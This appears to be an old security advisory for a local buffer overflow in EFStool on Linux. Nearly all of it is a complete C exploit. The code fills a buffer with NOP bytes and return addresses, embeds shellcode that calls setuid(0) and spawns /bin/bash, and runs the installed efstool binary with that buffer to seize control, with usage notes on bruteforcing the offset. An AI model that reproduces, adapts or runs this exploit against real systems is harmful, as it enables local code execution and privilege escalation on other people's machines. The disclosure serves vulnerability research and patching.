|
|
|
|
| |
| EFStool has been found to contain a security vulnerability that allows local attackers to cause it to execute arbitrary code. The vulnerability can be tested for by using the following exploit code. Note that EFStool is not setuid by default on the major Linux flavors. |
| |
Credit:
The information has been provided by Cloudass.
|
| |
Exploit:
/* efstool.c - efstool/bof simple overflow in efstool,
*
*
* This code is published propterty of CloudAss, you may
* duplicate this in any shape or form without prior written
* permission from CloudAss.
*
* Bug discovered by ntfx, just figured I'd code a decent
* exploit for it.
*
*
* DISCLAIMER - I am in no way affiliated with ntfx or any members of
* soldierx or legion2002 security.
*
* Usage: ./efsroot offset - bruteforce if neccesary
*
* Bug is pretty stupid, and simple, I have yet to see it give root.
* efstool is not +s on slackware 8.0 , it should spawn a shell
* regardless.
*
* (C) COPYRIGHT CloudAss , 2002
* all rights reserved
***********************************************************************
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#define SIZE 3000
#define NOP 0x90
#define PATH "/opt/gnome/bin/efstool"
//--------------------------------------------------
long get_esp(void){ __asm__("movl %esp,%eax\n");}
//--------------------------------------------------
char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/bash";
int main(int argc, char *argv[]) {
char buffer[SIZE];
long retaddr, offset;
int i;
offset = atoi(argv[1]);
retaddr = get_esp() + offset;
for(i=0; i < SIZE; i+=4)
*(long *)&buffer[i] = retaddr;
for(i=0; i < strlen(shellcode); i++)
*(buffer+i) = NOP;
memcpy(buffer+i, shellcode, strlen(shellcode));
execl(PATH, "efstool", buffer, 12);
return 0;
}
|
|
|
|
|
